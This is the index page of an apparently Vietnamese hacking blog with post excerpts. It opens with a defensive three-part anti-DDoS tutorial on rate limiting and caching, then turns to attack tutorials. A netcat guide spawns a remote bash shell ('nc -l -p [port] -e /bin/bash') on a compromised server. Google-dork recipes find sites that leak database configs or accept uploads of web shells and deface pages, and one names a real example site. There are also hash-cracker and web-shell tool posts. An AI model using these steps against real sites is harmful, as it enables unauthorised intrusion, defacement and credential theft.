Trang

[TUT] Anti DDoS - WebHunter - Phần 3

3. Phương pháp hạn chế.

Nhìn chung với DDoS chúng ta có 2 action cơ bản trong việc hạn chế (sau khi nhận ra được hình thức)

- Thứ nhất là block IP
- Thứ 2 là limit resource.

Block IP có được ưu điểm lớn đó là chặn luôn nguồn tấn công vào, điều này sẽ hạn chế được sự thất thoát tài nguyên, dĩ nhiên rồi vì mục tiêu của anti DDoS là hạn chế sự thất thoát tài nguyên, tuy nhiên bên cạnh đó chúng ta phải đối phó với bài toán khác đó chính là làm sao để lọc một cách cụ thể và chi tiết để không block lộn người dùng hợp lệ. Đây là vấn đề rất quan trọng đấy, nhưng không thảo luận ở đây.

Với cách thứ 2 là limit resource có ưu điểm chính là không block lộn người dùng, bởi vì chúng ta không áp dụng việc block. Thay vào đó chúng ta cần phải tính toán resource phù hợp cho các client, và phân bố cho hợp lý, vì vậy không sợ block nhầm người dùng. Tuy nhiên chúng ta phải đối phó với bài toàn lớn hơn là performance tuning system. Phải cấu hình làm sao cho hợp lý bởi vì lúc này chúng ta cũng đã công nhận rằng nguồn tấn công cũng là người dùng bình thường. Cho nên cũng cần phục vụ như người dùng bình thường.

Và biện pháp cuối cùng đó chính là kết hợp cả hai cái trên lại. Và nó dĩ nhiên là hiệu quả hơn.

Với việc Anti WebHunter, mình chọn biện pháp thứ 2, đó chính là giới hạn resource. Thực ra đây không phải là biện pháp tốt nhất, tuy nhiên bởi vì system của mình thường xuyên bị tấn công với nhiều loại phương pháp khác nhau cho nên buộc mình phải chọn hình thức nào ngăn chặn không chỉ một mà phải có hiệu quả với nhiều phương pháp.

Cụ thể là sau khi tính toán xong số liệu hợp lý, mình điều chỉnh lại firewall và performance tuning system của mình. Theo đó những rules sau đây đang được áp dụng :

- Mỗi IP chi có thể mở một kết nối đến system trong một thời điểm, thực ra sau khi tính toán thì mình nhận ra 1 là đủ, lúc đầu mình giới hạn ở mức 4 nhưng sau đó chuyển xuống 1 và tiếp tục theo dõi, kết quả rằng điều đó không làm ảnh hưởn người dùng, người dùng load vẫn nhanh và ổn định. => không cần nhiều hơn 1.
- Gia tăng thời gian keepalive lên, bởi vì một khi dùng ít kết nối thì cần gia tăng keepalive để việc truyền tải được trơn tru hơn.
- Áp dụng việc cache hợp lý, cache lại những thứ có thể cache, system của mình chủ yếu là trang tin, nội dung dữ liệu chỉ đọc cho nên có thể nói cache là một biện pháp performance tuning rất hiệu quả.
- Không giới hạn thời gian mở connection, bởi vì chỉ mở một kết nối thì có nghĩa là dù nhận được nhiều gói tin nữa thì cũng sẽ bị drop bởi kernel chứ không có kết nối nào được mở.
- Cuối cùng là một khi đã áp dụng những hình thức bên trên thì không cần block IP làm gì nữa, cứ để thoải mái. Dĩ nhiên là mình cũng có áp dụng việc block với syn flood, nhưng trong topic này chỉ nói về WebHunter cho nên mình không đề cập các hình thức khác.
Nói tóm lại, trong bài viết trên của mình chỉ là cách nhìn nhận và giải quyết ván đề của mình, cũng với cách nhìn nhận đó có thể có bạn khác đưa ra hình thức tốt hơn.
- XHACKER -

Xem Thêm

 

[TUT] Anti DDoS - WebHunter - Phần 2

2. WebHunter

Với WebHunter, mình từng bị WebHunter tấn công, lúc bị tấn công system của mình đang sử dụng Litespeed Free, với limit connection ở mức 2000 (quá ít đúng không :">), và thực sự lúc đó mình cũng không sử dụng firewall vì đang trong quá trình config mà thôi. Vài nhận xét mà mình thu thập được về hìn thức tấn công của WebHunter

- WebHunter tấn công không làm full bandwidth của system của mình, điều này được chứng minh thông qua việc mình không thể kết nối port 80 lúc đó nhưng những port khác mình vào bình thườg, và quan trọng hơn là bw mình đo trong system thông qua công cụ bwm-ng không cao, khoảng tầm 3MByte/s, dưới rất nhiều so với mức giới hạn bandwidth.

- Từ đây chúng ta có thể suy ra rằng, mục tiêu của WebHunter không phải là Bw của system mà là giới hạn connection của webserver và sự đứt gãy liên kết giữa Web server và back-end. Một kiểu tấn công điển hình vào trong CPU/RAM.

Xem Thêm

 

[TUT] Anti DDoS - WebHunter - Phần 1

1. Mọi thứ bắt đầu từ những việc đơn giản.

Chúng ta cùng xem lại định nghĩ DoS/DDoS là gì và phân tích bản chất của nó. Thực ra DoS/DDoS đều có một mục tiêu chung là làm cho victim phải mất khả năng phục vụ. Mà muốn victim không còn khả năng phục vụ thì có nghĩa rằng sẽ phải làm cho victim cạn kiệt tài nguyên (resource). Vậy resource ở đây bao gồm gì ?? Chúng ta có thể thấy resource ở đây là :

- CPU/RAM/HDD
- Bandwidth

Trong hai dạng resource trên thì dạng quan trọng hơn chính là Bandwidth, bởi vì với phương pháp tấn công vào trong CPU/RAM/HDD chúng ta có thể dễ dàng anti được, bởi lúc này vấn đề sẽ quay lại với việc làm sao performance tuning cho system. Bởi nếu giả sử như việc attack không diễn ra, nhưng tăng lượng người xem binh thường lên thì chúng ta cũng buộc phải performance tuning cho hệ thống. Có lẽ vì điểm này cho nên người ta thường nói với DDoS, việc đầu tư vào trong cơ sỡ hạ tầng là việc quan trọng hàng đầu.

Ngược lại với những hình thức tấn công vào trong Bandwidth thì không đơn giản, bởi vì hiện nay Bandwidth vẫn là một resource đắt đỏ và quan trọng, không rộng rãi và thoải mái như các resource kia. Cho nên theo ý kiến cá nhân thì việc attack vào trong bandwidth vẫn nguy hiểm hơn, giả sủa các bạn có thể có những rules hợp lý, có thể xử lý tốt, các bạn nhận ra được hình thức tấn công nhưng nếu như bandwidth không đủ thì việc người dùng truy cập cũng không thực hiện được.
- XHACKER-

Xem Thêm

 

share code bestmart.com.vn

Xem Thêm

 

Share code muapro.net

Xem Thêm

 

CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP

CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.

 CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP | Juno_okyo's Blog | http://junookyo.blogspot.com/ 
  • Detects common vulnerabilities such as:
    • SQL Injection
    • Cross Site Scripting (XSS)
    • Remote/Local File Inclusion
    • PHP Code Execution
    • Command Execution
    • File Access
    • File Upload
  • Searches for vulnerabilities in user-defined functions
  • Customizable scan options
  • Vulnerabilities are grouped based on file names and vulnerability type
  • Scan single or multiple files
  • Fast scanner
  • Easy to use and user-friendly Graphical User Interface (GUI)

Download Details:
  • Version: 1.0
  • Size: 3.71 MB
  • System Requirements: Microsoft Windows 8, Microsoft Windows 7, Windows Vista, or Windows XP

Xem Thêm

 

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

[IMG]
3.set chmod 777 for nc



[IMG]
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command
nc -vv [ip target] [port]




[IMG]

6.now you have back connect it

[IMG]

Xem Thêm

 

WebShell remote Configuration excution

webShell 4.O remote Configuration excution
             WebShell remote Configuration excution | Juno_okyo's Blog
Dorks : ext:php intitle:webSPELL v4.0
            "inurl:/picture.php?file="
Find  vulnerable website and goto  http://website.com/picture.php?file=_mysql.php
you'll get a Blanck Page 
press ctrl+U and view source 
you'll find something like this 
Now connect to database and do whatever you want
Live demo : 

Xem Thêm

 

CK Hash Cracker

CK Hash Cracker | Juno_okyo's Blog

CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here

__Change Log__
Hash Identifier Modified
Online Database Checker Bug Fixed And Works Faster
Offline Database Search Engine Modified
Rainbow Table Algorithm Added

How To Add Additional Database Release?

After Installation with the Default Settings, A Folder Named CK_Hash_Cracker Verion 3.0 will be Created in Root Directory/Program Files, which is mostly C: Drive, So that path will Be C:\Program Files\CK_Hash_Cracker-Version 3.0; under This Folder There Are Two Folders Named "Brute" And "DatabaseConnector"

Files Under "Brute" Folder Is Used For BruteForcing, Make Sure If You Place Additional WordList, You Do Not Have Duplicate Words, Otherwise It will just increase the Time. You Can Place Files With Any Name Under This Folder, It Will Work Fine, until the Files Are in Readable Format

Files Under "DatabaseConnector" Are The Offline Database, So For Any Database Releases, After Downloading Databases, Put The Files Under "DatabaseConnector" Folder And Thats It, The Tool Will Automatically Upgrade The Database.

Its Has A Self-Installer, So To Install, Just Run The Setup file. To Uninstall, You Can Remove It From Control Panel Or From The Self Uninstaller.

If You Get Error At Run-Time, Probably You Do Not Have The Microsoft Visual C++ 2008 Installed, The Application doesn't need Python To Run, But It Needs The Run-Time Components. You Get The Download Packages From Here:

For Windows 32 bit: Click Here

For Windows 64 bit: Click Here

And Then Try Running The Application.
CK_Hash_Cracker (Version 3.0) Download Link: Click Here

Xem Thêm

 

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"

Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option

Now select your shell or deface page and upload it

To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0 

Xem Thêm

 

Exidous CMD Shell

Connect to shell
Exidous CMD Shell | Juno_okyo's Blog


Connected
Exidous CMD Shell | Juno_okyo's Blog

XSA Tool
Exidous CMD Shell | Juno_okyo's Blog

Getting Username
Exidous CMD Shell | Juno_okyo's Blog

Going to that directory
Exidous CMD Shell | Juno_okyo's Blog

Dir Listing
Exidous CMD Shell | Juno_okyo's Blog
Just For Fun (/etc/passwd)

Download


Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương